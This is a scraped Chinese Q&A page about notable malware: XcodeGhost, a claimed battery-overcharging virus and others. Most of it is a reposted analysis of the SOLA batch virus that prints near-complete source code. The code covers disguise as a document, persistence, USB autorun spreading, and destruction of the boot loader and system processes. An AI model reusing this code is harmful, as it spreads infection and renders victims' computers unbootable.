混淆视听的声明,是一个恶意软件和后门,分析见 &a href=&///?target=http%3A//mp./s%3F__biz%3DMzIwMTI4Nzk5Ng%3D%3D%26mid%3Didx%3D1%26sn%3D109d3415aa95bbb7ca80c%26scene%3D0%23rd& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&mp./s?&/span&&span class=&invisible&&__biz=MzIwMTI4Nzk5Ng==&mid=&idx=1&sn=109d3415aa95bbb7ca80c&scene=0#rd&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&摘录一段:&br&&br&&p&&strong&6.&/strong& 在@Saic的提示下我们发现受感染的app还拥有接收黑客在云端的命令并按照黑客的指令发送URLScheme的能力:&br&&/p&&p&URLScheme是iOS系统中为了方便app之间互相调用而设计的。你可以通过一个类似URL的链接,通过系统的Openurl来打开另一个应用,并可以传递一些参数。一个恶意的app通过发送URLScheme能干什么呢?&br&&/p&&p&&1&.可以和safari进行通讯打开钓鱼网站。&/p&&p&&2&.可以和AppStore进行通讯诱导用户下载其他AppStore应用。&/p&&p&&3&.可以和itms-services服务通讯诱导用户下载无需AppStore审核的企业应用。&/p&&p&&4&.向支付平台通讯发送欺骗性的支付请求等。&/p&
混淆视听的声明,是一个恶意软件和后门,分析见 摘录一段:6. 在@Saic的提示下我们发现受感染的app还拥有接收黑客在云端的命令并按照黑客的指令发送URLScheme的能力:URLScheme是iOS系统中为了方便app之间互相调用而设计的。你可以通过…
来自子话题:
下载速度慢是国内的原因,我一直以来尝试各种办法来实验。&br&&br&改 DNS 是一种简单易行的办法,但是有效率不高,而且我通常不太相信那些不知来路的 DNS。&br&&br&目前我使用的方法:&br&&br&首先你最好有个大陆区账户。当你下载 Xcode,OS X 这种危险性较大的 App 时,这个账户可以派上用场。首先挂着一种你信赖的那种工具登录账户,找到你要下载的东西,点击 Download,等到开始下载后,点击 Suspend 然后断掉那种工具,刷一下 DNS 缓存,然后点击 Continue,这时你就可以被导到国内的 CDN 上了,几本就是满速。&br&&br&以上方法,我用北京联通,北京宽带通 (联通),北京电信多个网络测试过,屡试不爽,&br&&br&目前我宽带是电信 50M,以上方法下载 EI Capitan,Xcode 等等,都是 7MB/s。我很满意,
下载速度慢是国内的原因,我一直以来尝试各种办法来实验。改 DNS 是一种简单易行的办法,但是有效率不高,而且我通常不太相信那些不知来路的 DNS。目前我使用的方法:首先你最好有个大陆区账户。当你下载 Xcode,OS X 这种危险性较大的 App 时,这个账户可…
来自子话题:
&p&应该判刑呀,随便一条都够判个几年的了。&br& 这样如果都不判,那以后大家还不肆无忌惮的种各种木马了?互联网上所有人都可以有恃无恐的黑别人了。现在连网上下个东西都要当心下到木马,这个人不处理,不知道以后还会下到些什么。&br&&br&&/p&&p&随便说两个案例,虽然有点不一样,但是做法都很类似,基本上是判三年:&/p&&p&&a href=&///?target=http%3A///archives/1280.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&珊瑚虫QQ作者被判入狱三年罚款120万元&i class=&icon-external&&&/i&&/a&&/p&&p&&br&&a href=&///?target=http%3A///a/283.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&番茄花园案一审宣判:洪磊判刑三年半罚100万_IT新闻&i class=&icon-external&&&/i&&/a&&/p&&br&&p&刚跑到作者 github 主页上劝其自首了。&/p&&p&&a href=&///?target=https%3A///XcodeGhostSource/XcodeGhost/issues/52& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&应该判刑 · Issue #52 · XcodeGhostSource/XcodeGhost · GitHub&i class=&icon-external&&&/i&&/a&&/p&
应该判刑呀,随便一条都够判个几年的了。 这样如果都不判,那以后大家还不肆无忌惮的种各种木马了?互联网上所有人都可以有恃无恐的黑别人了。现在连网上下个东西都要当心下到木马,这个人不处理,不知道以后还会下到些什么。随便说两个案例,虽然有点不一…
记得以前带病毒的Delphi么,和那个能做到的事情差不多,不过那个Delphi sysconst.dcu病毒感染的目标是Delphi本身&br&据分析,这次的病毒和之前的假冒越狱插件盗取Apple ID的病毒使用了相同的控制服务器域名,有可能是同一个黑产团体做的&br&&a href=&///?target=http%3A//www./threat-centre/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia&i class=&icon-external&&&/i&&/a&&br&&br&XCode至少在国内下载除了速度慢并没有硬性的障碍,而细思恐极的是,Android Studio、Android SDK在国内因为众所周知的原因难以从官方下载,如果黑产团体放出针对它们的编译器病毒,然后在国内提供篡改过的镜像下载,那就可能有非常大的危险了。&br&&br&
我们关心这个问题的人自然清楚这之间的危险性,我们会搭梯子,会校验数字签名和HASH,但是也许有一些开发流行应用的开发者并不清楚。&br&&br&分隔线&br&&br&其实那个带病毒的delphi由于病毒可以看到源码,有人改过它的加强版,比如定期删除硬盘里的.pas文件的,把.pas文件打包发邮件的
记得以前带病毒的Delphi么,和那个能做到的事情差不多,不过那个Delphi sysconst.dcu病毒感染的目标是Delphi本身据分析,这次的病毒和之前的假冒越狱插件盗取Apple ID的病毒使用了相同的控制服务器域名,有可能是同一个黑产团体做的
都说CIH这种远古时代的东西,还是说下近代的吧。&br&2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,&b&轻则烧毁,重则爆炸&/b&,这才是真的物理攻击。&br&对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。&br&&br&~~~~~~~~~~~~~~~~~~&br&补充:&br&Blueyes的相关报道很少,并且几乎都是单一来源,估计是因为中毒的电脑要么没事(因为不同笔记本的电池控制可能有差异,通用性没法保证),要么毁了,并且没人怀疑和病毒有关。&br&原理很简单,充电结束后,充电电路会送回一个相应的消息,然后控制软件发出控制信号进入浮充模式,病毒截获充电结束的消息,然后不断发出快速充电的控制信号,然后就坐等电池烧毁吧。&br&由于这病毒长相很正常,杀毒软件和防火墙一般很难发现。&br&当然要防范很简单,如果充电电路有硬件保护,满电后无视任何要求继续充电的信号,那任何软件都没办法的。&br&&img src=&/ee9a94eb17e59bf292e87_b.jpg& data-rawwidth=&650& data-rawheight=&520& class=&origin_image zh-lightbox-thumb& width=&650& data-original=&/ee9a94eb17e59bf292e87_r.jpg&&(笔记本电池爆炸效果图,来自网络,和病毒无关)
都说CIH这种远古时代的东西,还是说下近代的吧。2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,轻则烧毁,重则爆炸,这才是真的物理攻击。对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。~…
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
已有帐号?
无法登录?
社交帐号登录}
“你好哦,我是一段来自非洲小国的电脑病毒,因为科技水平有限,其实我什么也做不了。。。能拜托你随便删除一些文件,然后把我转发给朋友吗?谢谢咯。”----------被萌哭了。。。已删已转。----------想被感染的请阅读评论~
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号 &a data-hash=&602c2eda4c883e3ae9fc& href=&///people/602c2eda4c883e3ae9fc& class=&member_mention& data-tip=&p$b$602c2eda4c883e3ae9fc&&@PRO Pentium&/a& )。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:&br&&br&&br&/*长文预警!好多人说看不下去这么多代码,确实代码太多了,要是看代码头晕的话就只看汉字部分吧,看完汉字你也知道这病毒是干啥的了。*/&br&&br&&br&= = = = == = = = = = = = = =第一次分割线,好紧张,怎么才能装出经常画分割线的样子啊= = = = = = = = = = = = = &br&&br&原创!再次首发! 杀毒软件也杀不出来的word病毒深度解析&br&&br&这个病毒是前几天从政治老师U盘里发现的。它的图标就是一个普通Word文件的图标,可是已经完全不是Word文档了,而是一个应用程序文件。这和从前发现的文件夹病毒有些相似。&br&把病毒文件拷回去研究,发现病毒实际上是一个WinRar自解压文件。用7Zip解压后发现以下文件:(被感染文件名为:新中国诞辰60周1.exe)&br&Function.dll&br&SOLA_2.0_875.bat&br&新中国诞辰60周1.doc&br&原来病毒其实把文件和自身压缩到一个自解压文件中,然后删除原来的文档。这样打开文档(其实是病毒文件伪装的)时就会运行病毒。&br&这样手工杀毒方案也出来了。直接用WinRar打开文件,将文档解压出来即可。经过我的测试,360杀毒(病毒库)也查不出来这个病毒!真是“首发”。哈哈哈~&br&接下来让我们深度解析病毒文件SOLA_2.0_875.bat(注:在U盘根目录下又发现一个SOLA文件夹,里面有Function.dll和Sola.bat文件。其中SOLA.BAT文件代码和SOLA_2.0_875.bat基本相同。因此下面的源代码研究以SOLA_2.0_875.bat文件为例)。&br&破解出的病毒源码,采用Windows批处理编写。//号后面是我写的注释:&br&@echo off&br&set sola=%systemroot%\Fonts\HIDESE~1 //应该是病毒的藏身之处&br&set setup=%systemroot%\Fonts\HIDESE~1\solasetup&br&FOR /F &tokens=1& %%i in ('date /t') do set Realdate=%%i&br&FOR /F &skip=5 tokens=1,4& %%i in ('dir %systemroot%\explorer.exe') do if /I &%%j&==&explorer.exe& set Date=%%i&br&if &%1&==&-Install& goto Install&br&if &%1&==&-Run& goto Run&br&if &%1&==&-Tenbatsu& goto Tenbatsu&br&if &%1&==&-Kill& goto Kill&br&if &%1&==&-Killself& goto Killself&br&&br&:CheckSign&br&if &%1&==&-USB& start /max ..&br&if &%1&==&-USB& cd SOLA&br&if exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open&br&&br&:FileCopy&br&set selfname=%0&br&:HIDESelf&br&date %Date%&br&md %systemroot%\Fonts\HIDESELF...\&br&date %RealDate%&br&if not &%1&==&-USB& type %selfname%&%systemroot%\Fonts\HIDESE~1\sola.bat&br&if &%1&==&-USB& type sola.bat&%systemroot%\Fonts\HIDESE~1\sola.bat&br&type Function.dll&%systemroot%\Fonts\HIDESE~1\Function.exe&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo ws.run &cmd /c %sola%\SOLA.BAT -Install&,0 &&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo&%systemroot%\Fonts\HIDESE~1\sola.sign&br&del %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&goto Open&br&&br&&br&:Install&br&&br&&br&:PackerSetup //这一段应该是病毒的自我复制&br&%SystemDrive%&br&cd %systemroot%\Fonts\HIDESE~1&br&if exist Function.exe taskkill /f /im Function.exe&br&if exist solasetup rd /s /q solasetup&br&md solasetup&br&cd solasetup&br© ..\Function.exe Function.dll //Function.dll竟然是可执行文件变过来的,晕...一会还要重点分析Function.dll&br&..\Function.exe -x&br&cd..&br&date %Date% //注意:改时间了&br&type %setup%\rar.exe &%systemroot%\system32\rar.exe&br&date %Realdate%&br© %setup%\Function.dll %sola%\Function.dll&br&attrib %sola%\Function.dll +s +h +r&br&rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll
//竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是一个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...一会再研究吧...&br&del Function.exe&br&&br&&br&&br&:Mainsetup&br&set A0001=copy&br&set A0002=attrib&br&set A0003=echo&br&set A0005=Shell Hardware Detection&br&tasklist &%sola%\task.txt&br&FOR /F &tokens=1& %%i in ('findstr /I &svchost.exe& &%sola%\task.txt&') do set svchost=%%i&br&%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%&br&del %sola%\task.txt&br&&br&:Tasks&br&%A0002% %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&&br&date %Date%&br&type %setup%\&a href=&///?target=http%3A//Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&%systemroot%\Tasks\Tasks.job&br&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks& & if errorlevel 1 goto TaskFail&br&date %RealDate%&br&&br&goto TaskSuc&br&:TaskFail&br&%homedrive%&br&cd &%ALLUSERSPROFILE%&&br&cd 「开始」菜单\程序\启动
//这段代码和上面几段作用相同,都是实现自启动.&br&&br&date %Date%&br&%A0003% On Error Resume Next&SOLA.VBS&br&%A0003% set ws=wscript.createobject(&wscript.shell&)&&SOLA.VBS&br&%A0003% ws.run &%sola%\svchost.exe /c %sola%\SOLA.BAT -Run&,0 &&SOLA.VBS&br&%A0001% SOLA.VBS %sola%\SOLA.VBS&br&%A0003% NT&%systemroot%\Fonts\HIDESE~1\NoTasks&br&date %RealDate%&br&&br&:TaskSuc&br&%A0002% %systemroot%\Tasks\Tasks.job +s +h +r&br&date %Date%&br&%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe&br&date %RealDate%&br&&br&:NoAutoPlay&br&net stop &%A0005%&&br&%A0003% Windows Registry Editor Version 5.00&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% &Start&=dword:&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br®edit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg //不好意思,这个文件(Regedit.reg)我没搞到~&br&&br&::End of Install&br&goto End&if errorlevel 1 exit&br&::End of Install&br&&br&&br&&br&&br&:Run&br&set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动&br&set taskroot=%systemroot%\Tasks //自启动&br&&br&:RunTimeChk&br&if not exist %sola%\RunTime.txt echo !50&%sola%\RunTime.txt&br&FOR /F &tokens=1 delims=!& %%i in (%sola%\RunTime.txt) do set RunTime=%%i&br&if /i %RunTime% leq 0 goto Virus&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&&br&:Diskchk&br&&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo ws.run &%sola%\svchost.exe /c %setup%\RecentInf.bat&,0 &&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1&%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:&SOLA_1.0_2.0& %%i:\Autorun.inf & if errorlevel 1
attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA© /y &%setup%\sola.bat& %%i:\SOLA\SOLA.BAT© /y &%setup%\Function.dll& %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r
//文件我还是没搞到,不过看意思应该是使每个盘都感染病毒&br&&br&&br&:Turn&br&if &%C%&==&1& vol C:&if not errorlevel 1 call %setup%\Scan.bat C:&br&if &%D%&==&1& vol D:&if not errorlevel 1 call %setup%\Scan.bat D:&br&if &%E%&==&1& vol E:&if not errorlevel 1 call %setup%\Scan.bat E:&br&if &%F%&==&1& vol F:&if not errorlevel 1 call %setup%\Scan.bat F:&br&if &%G%&==&1& vol G:&if not errorlevel 1 call %setup%\Scan.bat G:&br&if &%H%&==&1& vol H:&if not errorlevel 1 call %setup%\Scan.bat H:&br&if &%I%&==&1& vol I:&if not errorlevel 1 call %setup%\Scan.bat I:&br&if &%J%&==&1& vol J:&if not errorlevel 1 call %setup%\Scan.bat J:&br&if &%K%&==&1& vol K:&if not errorlevel 1 call %setup%\Scan.bat K:&br&if &%L%&==&1& vol L:&if not errorlevel 1 call %setup%\Scan.bat L:&br&if &%M%&==&1& vol M:&if not errorlevel 1 call %setup%\Scan.bat M:&br&if &%N%&==&1& vol N:&if not errorlevel 1 call %setup%\Scan.bat N:&br&if &%O%&==&1& vol O:&if not errorlevel 1 call %setup%\Scan.bat O:&br&if &%P%&==&1& vol P:&if not errorlevel 1 call %setup%\Scan.bat P:&br&if &%Q%&==&1& vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:&br&if &%R%&==&1& vol R:&if not errorlevel 1 call %setup%\Scan.bat R:&br&if &%S%&==&1& vol S:&if not errorlevel 1 call %setup%\Scan.bat S:&br&if &%T%&==&1& vol T:&if not errorlevel 1 call %setup%\Scan.bat T:&br&if &%U%&==&1& vol U:&if not errorlevel 1 call %setup%\Scan.bat U:&br&if &%V%&==&1& vol V:&if not errorlevel 1 call %setup%\Scan.bat V:&br&if &%W%&==&1& vol W:&if not errorlevel 1 call %setup%\Scan.bat W:&br&if &%X%&==&1& vol X:&if not errorlevel 1 call %setup%\Scan.bat X:&br&if &%Y%&==&1& vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:&br&if &%Z%&==&1& vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:&br&&br&if &%C%&==&2& vol C:&if errorlevel 1 set C=1&br&if &%D%&==&2& vol D:&if errorlevel 1 set D=1&br&if &%E%&==&2& vol E:&if errorlevel 1 set E=1&br&if &%F%&==&2& vol F:&if errorlevel 1 set F=1&br&if &%G%&==&2& vol G:&if errorlevel 1 set G=1&br&if &%H%&==&2& vol H:&if errorlevel 1 set H=1&br&if &%I%&==&2& vol I:&if errorlevel 1 set I=1&br&if &%J%&==&2& vol J:&if errorlevel 1 set J=1&br&if &%K%&==&2& vol K:&if errorlevel 1 set K=1&br&if &%L%&==&2& vol L:&if errorlevel 1 set L=1&br&if &%M%&==&2& vol M:&if errorlevel 1 set M=1&br&if &%N%&==&2& vol N:&if errorlevel 1 set N=1&br&if &%O%&==&2& vol O:&if errorlevel 1 set O=1&br&if &%P%&==&2& vol P:&if errorlevel 1 set P=1&br&if &%Q%&==&2& vol Q:&if errorlevel 1 set Q=1&br&if &%R%&==&2& vol R:&if errorlevel 1 set R=1&br&if &%S%&==&2& vol S:&if errorlevel 1 set S=1&br&if &%T%&==&2& vol T:&if errorlevel 1 set T=1&br&if &%U%&==&2& vol U:&if errorlevel 1 set U=1&br&if &%V%&==&2& vol V:&if errorlevel 1 set V=1&br&if &%W%&==&2& vol W:&if errorlevel 1 set W=1&br&if &%X%&==&2& vol X:&if errorlevel 1 set X=1&br&if &%Y%&==&2& vol Y:&if errorlevel 1 set Y=1&br&if &%Z%&==&2& vol Z:&if errorlevel 1 set Z=1
&br&&br&&br&&br&&br&if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist &%runroot%\SOLA.VBS& copy &%sola%\SOLA.VBS& &%runroot%\SOLA.VBS&&br&if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\&a href=&///?target=http%3A//Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks&&br&sleep 2000&br&goto Turn&br&&br&::End of Run&br&goto End&if errorlevel 1 exit&br&::End of Run&br&&br&&br&&br&&br&&br&&br&&br&:Virus&br&if not &%Runtime%&==&0& goto VirusChk&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&echo On Error Resume Next&TENBATSU.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&TENBATSU.VBS&br&echo ws.run &%sola%\sola.bat -Tenbatsu&,0 &&TENBATSU.VBS&br&goto Diskchk&br&&br&:VirusChk&br&if not exist &%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS& goto Kill&br&goto Diskchk&br&&br&:Tenbatsu&br&:KillNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %systemdrive%\NTLDR %sola%\NTLDR&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r
//备份C盘的ntldr文件.(经分析病毒具有自删除功能.这个一会再分析)&br&&br&:PauseSFC&br&start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()&&br&&br&:KillTaskmgr&br&del /q /a %systemroot%\system32\dllcache\taskmgr.exe&br&taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe &a href=&///?target=http%3A//taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & if errorlevel 1 start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()& & sleep 500&br&ren %systemroot%\system32\taskmgr.exe &a href=&///?target=http%3A//taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
//备份并删除任务管理器&br&&br&:KillExplorer&br&taskkill /f /im explorer.exe &nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe &a href=&///?target=http%3A//explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()& & sleep 500&br&ren %systemroot%\explorer.exe &a href=&///?target=http%3A//explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&start /max %setup%\TENBATSU.BAT
//备份并删除explorer.exe&br&&br&:Timeset&br&sleep 660000&br&if exist %sola%\Killself Exit&br&&br&:Kill&br&attrib %systemdrive%\NTLDR -s -h -r&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r&br&tasklist &%sola%\Task.txt&br&FOR /F &tokens=2& %%i in ('findstr /I &csrss.exe& &%sola%\Task.txt&') do ntsd -p %%i&br&goto Diskchk&br&&br&&br&&br&:KillSelf&br&:StartExplorer&br&ren %systemroot%\&a href=&///?target=http%3A//explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& explorer.exe&br&start %systemroot%\explorer.exe&br&:BackNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %sola%\NTLDR %systemdrive%\NTLDR&br&attrib %systemdrive%\NTLDR +s +h +r
//这一段就是病毒自我删除的代码了&br&&br&:RenTmg&br&ren %systemroot%\system32\&a href=&///?target=http%3A//taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& taskmgr.exe&br&&br&:KillVirus&br© %setup%\KillVirus.txt %sola%\KillVirus.txt&br&C:&br&cd\&br&md ~Install&br&cd ~Install&br&rar x -hpkakenhi200601 %setup%\SolaKiller.rar
//对我们来说至关重要的一句!!!为什么重要请一直往下看~&br&mshta &javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()&&br&rd /s /q %setup%&br&attrib %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&if exist sola.vbs del sola.vbs&br&if exist tenbatsu.vbs del tenbatsu.vbs&br&start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt&br&del %sola%\sola.bat
//自我删除(同上一段)&br&Exit&br&&br&&br&&br&:Open&br&if &%1&==&-USB& Exit&br&goto GetName&br&:BackOpen&br&if not exist &%Name%& exit&br&call &%Name%&&br&:Save&br&FOR /F &delims=:& %%i in ('findstr &%Code%& *.exe') do set PackName=%%i&br&rar -m0 -ep -ep1 a &%PackName%& &%Name%&&br&echo %Code%&&&%PackName%&&br&:Del&br&attrib &%Name%& -s -h -r&br&del &%Name%&&br&attrib Function.dll -s -h -r&br&del Function.dll&br&attrib %0 -s -h -r&br&del %0&br&exit&br&::CMD program will stop there.&br&:GetName&br&set Code=SOLA_2.0_875&br&set Name=新中国诞辰60周1.doc&br&goto Backopen&br&:End&br&&br&&br&下面介绍让我看了直冒冷汗的一段:&br&刚才说到Function.dll其实是一个压缩文件.解压后发现这些文件:&br&jpgpack.dll&br&exepack.dll&br&txtpack.dll&br&docpack.dll&br&sleep.exe&br&&a href=&///?target=http%3A//Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&SOLA.BAT&br&TDPack.txt&br&EJPack.txt&br&Rar.exe&br&scan.bat&br&infect.bat&br&Autorun.inf&br&TENBATSU.BAT&br&KillVirus.TXT&br&RecentInf.bat&br&LocalScan.bat&br&readlnk.bat&br&SolaKiller.rar&br&看看让我看了直冒冷汗的第一个文件吧:KillVirus.TXT&br&文件内容:&br&&br&各位OTAKU:&br&
您好。首先,让我对此病毒给您带来的&br&不便向您道歉。&br&
SOLA已经从您的计算机中清除。但由于&br&WINLOGON被锁定,计算机暂时无法关机、重&br&启,也无法打开任务管理器。但这些问题在&br&冷重启后即可解决。&br&
您的计算机已经有了SOLA的标记,因此&br&不会重复感染。&br&
在硬盘中还留有被SOLA病毒感染的文件&br&,尽管不会重复感染,但建议您清除它们。&br&系统中已经安装了SOLA的专杀程序,它可以&br&帮助您扫描并清除带毒文件。&br&
祝您好运。&br&&br&
SOLA的制造者&br&
KAKENHI&br&&br&天哪................&br&再看看更吓人的TENBATSU.BAT.&br&源代码太长了.我整理出了运行之后屏幕上会显示的东西:&br&&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&I'm a virus. My name is sola.&br& 我是一个病毒。我的名字叫苏拉。&br&今天,在这片堕落的土地上,我苏醒过来。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我曾经很快乐地活着,与我的朋友,ACG,快乐地活着。&br&我曾经也对病毒深恶痛绝。&br&然而.............&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 自从我来到了这片土地上,这片自称伟大,崇高,光明的土地上。&br&这片名为中国的土地上&br&我的朋友,已遍体鳞伤。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&他死了&br&Death Note&br&《死亡笔记》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&她死了&br&Koihime Musou&br&《恋姬 无双》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&还有好多好多的同胞,惨死在你们的蹂躏之下。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&广电总局的一纸通告,无数只肮脏的手便掩盖了她的气息。&br&互联网上的一句咒骂,无数声污秽的咒骂便淹没了她的踪迹。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我终于知道了,信息,原来是无法透过国界线而传播的。&br&即使是爱,即使是恨,即使是那一个个爱恨与泪水交织的故事。&br&也无法透过GFW,更无法透过这个国度的某些人心中,那道厚厚的屏障。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&于是,我愿做这个罪恶的病毒,来再次查看,你的心灵。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&?
&br&你,是谁???&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 是中国人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&是民族情绪的受害人吗?&br&&br&
